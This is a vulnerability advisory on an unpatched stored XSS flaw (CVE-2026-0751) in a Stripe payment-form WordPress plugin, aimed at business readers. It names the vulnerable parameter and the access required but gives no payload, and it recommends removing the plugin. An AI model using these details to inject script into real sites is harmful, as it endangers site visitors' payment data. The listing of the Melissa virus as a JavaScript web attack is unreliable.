Attack Vectors

Payment Page | Payment Form for Stripe (WordPress plugin slug: payment-page) has a Medium-severity vulnerability (CVSS 6.4) identified as CVE-2026-0751. It affects all versions up to and including 1.4.6.

The attack requires an authenticated WordPress account with Author-level access or higher. An attacker in that position can abuse the plugin’s pricing_plan_select_text_font_family parameter to place malicious script content into stored settings/content, which can then execute when someone visits an impacted page.

Practically, this is most relevant when multiple people (employees, contractors, agencies, partners) have content publishing permissions. If any of those accounts are compromised through phishing, password reuse, or malware, the attacker could use that access to inject persistent malicious code into pages tied to payment flows or campaign landing pages.

Security Weakness

The root issue is insufficient input sanitization and output escaping in how the plugin handles the pricing_plan_select_text_font_family parameter. That gap allows stored cross-site scripting (Stored XSS): attacker-controlled script is saved and later rendered to site visitors.

This issue is categorized as stored because the injected content can remain in place and execute repeatedly, not just once. Because it can run in the context of your site, it can potentially interact with what your visitors see and do, including critical pages involved in lead capture and payments.

At the time of writing, there is no known patch available. Remediation guidance from the source recommends reviewing details and applying mitigations based on your organization’s risk tolerance, which may include uninstalling the affected plugin and replacing it.

Technical or Business Impacts

Brand and revenue risk: A stored script running on payment or checkout-related pages can undermine trust at the exact moment a customer is deciding to convert. Even short-lived malicious behavior can cause abandoned checkouts, lost leads, and reputational damage that persists after cleanup.

Data exposure risk: The vulnerability’s CVSS vector indicates a scope change and low confidentiality/integrity impact (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N). In business terms, that means an attacker could potentially access or manipulate some information within the web session or page experience in ways that matter for privacy and compliance, even if it’s not a full site takeover.

Compliance and governance risk: If malicious scripts run on pages collecting customer details, it can trigger incident response requirements, internal reporting, and potential regulatory scrutiny depending on the data involved and your jurisdiction. Marketing teams may also need to pause campaigns while investigations occur, impacting pipeline and forecasts.

Operational disruption: With no known patch, mitigation may require disabling or replacing Payment Page | Payment Form for Stripe. That can affect payment workflows, landing pages, analytics, and integrations—creating coordination work across Marketing, IT, Finance, and Compliance.

Similar Attacks

Stored XSS is a common technique used in real-world website compromises because it can persist and silently affect many visitors. Here are a few well-documented examples of JavaScript-based web attacks and payment-page targeting behavior:

Melissa virus (1999) — an early example of malicious scripting/automation spreading through user interactions and trusted workflows.

Magecart attacks — widely reported campaigns where attackers inject malicious code into e-commerce sites to capture payment-related information.

CISA advisory on web skimming and related threats — guidance highlighting risks of malicious scripts on web pages that handle sensitive customer and payment interactions.